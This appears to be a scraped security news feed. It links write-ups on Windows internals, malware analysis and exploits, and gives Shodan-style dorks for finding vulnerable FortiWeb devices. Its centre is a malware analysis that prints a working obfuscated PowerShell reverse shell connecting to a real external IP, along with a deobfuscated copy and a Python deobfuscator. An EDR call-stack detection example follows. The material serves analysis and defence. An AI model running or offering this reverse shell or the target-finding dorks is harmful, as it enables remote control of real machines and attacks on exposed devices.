Windows Instrumentation Callbacks
#kernel_callbacks #windows_internals #windows_kernel
@ZwLowLevel
https://cirosec.de/en/news/windows-instrumentation-callbacks/
cirosec
Windows Instrumentation Callbacks - cirosec
November 5, 2025 - This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs). Author: Lino Facco
#windbg #malware_analysis #process_hollowing
@ZwLowLevel
https://cloud.google.com/blog/topics/threat-intelligence/time-travel-debugging-using-net-process-hollowing
Google Cloud Blog
Time Travel Triage: An Introduction to Time Travel Debugging using a .NET Process Hollowing Case Study | Google Cloud Blog
The basics of WinDbg and Time Travel Debugging necessary to start incorporating it into your analysis.
GuLoader: Evolving Tactics in Latest Campaign Targeting European Industry
#guloader #malware_analysis #malware_campaign
@ZwLowLevel
Darktrace
Guloader: Evolving Tactics in Latest Campaign Targeting European Industry
Cado Security Labs (now part of Darktrace) identified a GuLoader campaign targeting European industrial companies via spearphishing emails.
Forwarded from 1N73LL1G3NC3
Fortinet 0day
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Tweet: https://x.com/defusedcyber/status/1975242250373517373?s=46
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
Shodan: http.noscript:FortiWeb
Affected versions: below 8.0.2
#malware_development #maldev #hooking
@ZwLowLevel
https://github.com/kas-sec/version.dll-sideloading.git
GitHub
GitHub - kas-sec/version.dll-sideloading: sideloading PoC using onedrive.exe & version.dll
sideloading PoC using onedrive.exe & version.dll. Contribute to kas-sec/version.dll-sideloading development by creating an account on GitHub.
Forwarded from Golden Byte
#kernel_exploit #ps5 #binary_exploitation
@ZwLowLevel
https://github.com/MeisterLone/no_ctrl
#rootkit #linux_kernel #evasive_malware
@ZwLowLevel
https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis
Synacktiv
LinkPro: eBPF rootkit analysis
#apple_exploit #macos #malware
@ZwLowLevel
https://pberba.github.io/security/2025/11/11/macos-infection-vector-applescript-bypass-gatekeeper/
pepe berba
MacOS Infection Vector: Using AppleScripts to bypass Gatekeeper
A look at how threat actors are abusing AppleScript .scpt files to deliver macOS malware, from fake documents to browser update lures, and how these scripts ...
#hardware_hacking #iot
@ZwLowLevel
https://hackmag.com/security/gadgets-howto-3
HackMag
Home IoT Device Teardown and Analysis: A Complete Guide to Hardware Hacking
Tech magazine for cybersecurity specialists
No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE
#binary_exploitation #exploitation #aslr_bypass #rop_chain #rce
@ZwLowLevel
https://modzero.com/en/blog/no-leak-no-problem/
Modzero
No Leak, No Problem - Bypassing ASLR with a ROP Chain to Gain RCE
How a Catch-22 Breaks AMD SEV-SNP
(ACM CCS 2025)
#amd #sev_snp #os_internals
@ZwLowLevel
https://rmpocalypse.github.io/rmpocalypse-CCS2025.pdf
RMPocalypse Attack
How A Catch-22 Breaks AMD SEV-SNP
${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()
Now deobfuscated:
# Connect back to the hard-coded address and port
$ip = "62.113.66.7"
$port = 443
$client = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $client.GetStream()
# 8 KiB receive buffer
[byte[]]$buffer = 0..8191 | ForEach-Object { 0 }
# Every chunk read from the socket is executed as a script in a fresh PowerShell instance and its output is written back
while (($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
    $command = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $bytesRead)
    $result = ([System.Management.Automation.PowerShell]::Create()).AddScript($command).Invoke() | Out-String
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($result)
    $stream.Write($bytes, 0, $bytes.Length)
    $stream.Flush()
}
$client.Close()
@ZwLowLevel
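The manual deobfuscation above can be automated for this class of one-liner. The following is an added example, not code from the original post: it folds the `'a'+'b'` string concatenations and the `4*100+43` style integer arithmetic the sample uses, substitutes the resulting literals back for the `${n}` variables, and then pulls the address and port out of the `TcpClient` constructor call. The one-liner from the post is embedded as the constant `SAMPLE`; the function names (`fold_strings`, `fold_arith`, `resolve_vars`, `deobfuscate`, `extract_c2`) are this example's own. Arithmetic is evaluated with a whitelisted AST walker rather than `eval`, so nothing in the script is ever executed.

```python
"""Static deobfuscation of a string-concatenation / arithmetic obfuscated
PowerShell reverse shell. Added example; SAMPLE is the one-liner from the post."""
import ast
import operator
import re

SAMPLE = r"""${1}='62'+'.113'+'.66'+'.7';${2}=4*100+43;${3}='Ne'+'t.'+'Soc'+'ket'+'s.'+'Tcp'+'Cli'+'ent';${4}=new-object ${3}(${1},${2});${5}=${4}.GetStream();[byte[]]${6}=0..(8*1024-1)|%{0};while((${7}=${5}.Read(${6},0,${6}.Length)) -ne 0){${8}=[System.Text.Encoding]::ASCII.GetString(${6},0,${7});${9}=([System.Management.Automation.PowerShell]::Create()).AddScript(${8}).Invoke()|Out-String 2>&1|out-string;${10}=[System.Text.Encoding]::ASCII.GetBytes(${9});${5}.Write(${10},0,${10}.Length);${5}.Flush()};${4}.Close()"""

# Only these operators are ever evaluated; anything else raises.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def _eval_arith(expr: str) -> int:
    """Evaluate an integer expression built from +, - and * without eval()."""
    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError(f"unsupported expression: {expr!r}")
    return ev(ast.parse(expr, mode="eval").body)


# 'ab'+'cd'+... runs of single-quoted literals joined with +
_CONCAT = re.compile(r"(?:'[^']*'\s*\+\s*)+'[^']*'")
# =4*100+43;   (arithmetic assigned directly to a variable)
_ARITH_AFTER_EQ = re.compile(r"=(\d+(?:\s*[-+*]\s*\d+)+)(?=;)")
# (8*1024-1)   (arithmetic in parentheses, e.g. a buffer size)
_ARITH_PAREN = re.compile(r"\((\d+(?:\s*[-+*]\s*\d+)+)\)")
# ${n}='literal';  or  ${n}=123;
_LITERAL_ASSIGN = re.compile(r"\$\{(\d+)\}=('[^']*'|\d+);")
# TcpClient('1.2.3.4',443) after substitution (the literal is still quoted)
_TCP = re.compile(r"TcpClient'?\(\s*'(\d{1,3}(?:\.\d{1,3}){3})'\s*,\s*(\d+)\s*\)")


def fold_strings(text: str) -> str:
    """Collapse 'a'+'b'+'c' into 'abc'."""
    return _CONCAT.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", text)


def fold_arith(text: str) -> str:
    """Replace simple integer arithmetic with its value."""
    text = _ARITH_AFTER_EQ.sub(lambda m: "=" + str(_eval_arith(m.group(1))), text)
    return _ARITH_PAREN.sub(lambda m: str(_eval_arith(m.group(1))), text)


def resolve_vars(text: str) -> str:
    """Substitute ${n} with its literal wherever ${n} was assigned a plain literal.
    The assignment itself (${n}= ...) is left in place so the script stays readable."""
    for name, value in _LITERAL_ASSIGN.findall(text):
        text = re.sub(r"\$\{%s\}(?!=)" % name, lambda _m, v=value: v, text)
    return text


def deobfuscate(text: str) -> str:
    return resolve_vars(fold_arith(fold_strings(text)))


def extract_c2(text: str):
    """Return (address, port) from the TcpClient constructor call, or None."""
    m = _TCP.search(text)
    if not m:
        return None
    return m.group(1), int(m.group(2))


if __name__ == "__main__":
    clean = deobfuscate(SAMPLE)
    print(clean)
    print("C2 endpoint:", extract_c2(clean))
```

Running it prints the folded script and the tuple `('62.113.66.7', 443)`, matching the manual deobfuscation above. The same three passes handle any script that hides its constants only through `+` concatenation and integer arithmetic; formats that use `-join`, `[char]` arrays or Base64 would need an additional pass each.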
The stack frame anomalies can be observed when the Detours library is used to implement user-land hooks. In this context the hooks are placed on MessageBoxW, which is not very realistic for security vendors in the real world; in a real setting, EDRs deploy sensors to monitor calls to the native (Nt*) functions in a variety of contexts, for example:
Functions for process injection:
NtOpenProcess
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx
Mapping section objects into memory:
NtCreateSection
NtMapViewOfSection
NtUnmapViewOfSection
@ZwLowLevel
In summary, although security vendors use a variety of sensors to collect telemetry in an environment, hooking today remains a powerful method for identifying an anomalous call stack.
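What "an anomalous call stack" means in practice for a sensor hooked on one of the Nt* functions listed above is shown in the following added example, which is not code from the original post. It takes a list of return addresses captured inside the hook and a module map of the process (both constructed here with made-up addresses) and applies two checks: a return address that is not backed by any loaded module, and a first caller of an Nt* function that is not one of the Win32 wrapper DLLs. The names `Module`, `module_for`, `analyse_stack`, the reason codes and the sample stacks `BENIGN`, `DIRECT` and `UNBACKED` are all this example's own.

```python
"""Classify a captured call stack the way a user-land hook on an Nt* function
lets a sensor do it. Added example; the module map and return addresses are
constructed, hypothetical values, not from a real process."""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# Constructed module map of a hypothetical 64-bit process (addresses are made up).
MODULES = [
    Module("ntdll.dll",      0x7FFB_1000_0000, 0x001F_0000),
    Module("kernelbase.dll", 0x7FFB_0D00_0000, 0x002C_0000),
    Module("kernel32.dll",   0x7FFB_0F00_0000, 0x000C_0000),
    Module("app.exe",        0x7FF6_0000_0000, 0x0004_0000),
]

# DLLs that legitimately sit directly above an Nt* call (the Win32 API layer).
WIN32_WRAPPERS = {"ntdll.dll", "kernelbase.dll", "kernel32.dll"}


def module_for(addr: int, modules: List[Module] = MODULES) -> Optional[Module]:
    """Map a return address to the loaded image that contains it, if any."""
    for m in modules:
        if m.contains(addr):
            return m
    return None


def analyse_stack(frames: List[int], hooked_api: str,
                  modules: List[Module] = MODULES) -> List[Tuple[int, str]]:
    """frames: return addresses captured inside the hook, innermost caller first,
    i.e. frames[0] is the code that called the hooked function (the detour's own
    trampoline frame is assumed to have been skipped by the capture).
    Returns (frame_index, reason) findings; an empty list means nothing anomalous."""
    findings: List[Tuple[int, str]] = []
    # Check 1: every return address should land inside a loaded image.
    for i, addr in enumerate(frames):
        if module_for(addr, modules) is None:
            findings.append((i, "UNBACKED_RETURN"))
    # Check 2: an Nt* function is normally reached through the Win32 wrappers;
    # a direct call from the executable or from private memory is worth a closer look.
    if hooked_api.startswith("Nt") and frames:
        caller = module_for(frames[0], modules)
        if caller is None or caller.name not in WIN32_WRAPPERS:
            findings.append((0, "DIRECT_NT_CALL"))
    return findings


# Constructed sample stacks (innermost caller first).
BENIGN = [0x7FFB_0D01_2345, 0x7FFB_0F02_0100, 0x7FF6_0001_0000]   # kernelbase -> kernel32 -> app.exe
DIRECT = [0x7FF6_0001_2000, 0x7FF6_0001_2100]                     # app.exe calls the Nt* function itself
UNBACKED = [0x0000_01A2_B000_1000, 0x7FF6_0001_2000]              # private memory -> app.exe


if __name__ == "__main__":
    for label, stack, api in (("benign", BENIGN, "NtAllocateVirtualMemory"),
                              ("direct", DIRECT, "NtWriteVirtualMemory"),
                              ("unbacked", UNBACKED, "NtCreateThreadEx")):
        print(label, api, analyse_stack(stack, api))
```

Both checks are heuristics, not verdicts: some legitimate software does call Nt* functions directly, and JIT-compiled code (the .NET runtime, browsers) produces return addresses outside any image by design, so a real sensor scores these findings together with the rest of its telemetry rather than alerting on either alone.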
This project demonstrates CodeDefender's ability to obfuscate kernel and bootloader files. The modified system includes obfuscated critical system functions and bypassed security mechanisms.
#low_level #windows_kernel #windows_internals #uefi #bootloader
@ZwLowLevel
https://github.com/codedefender-io/windows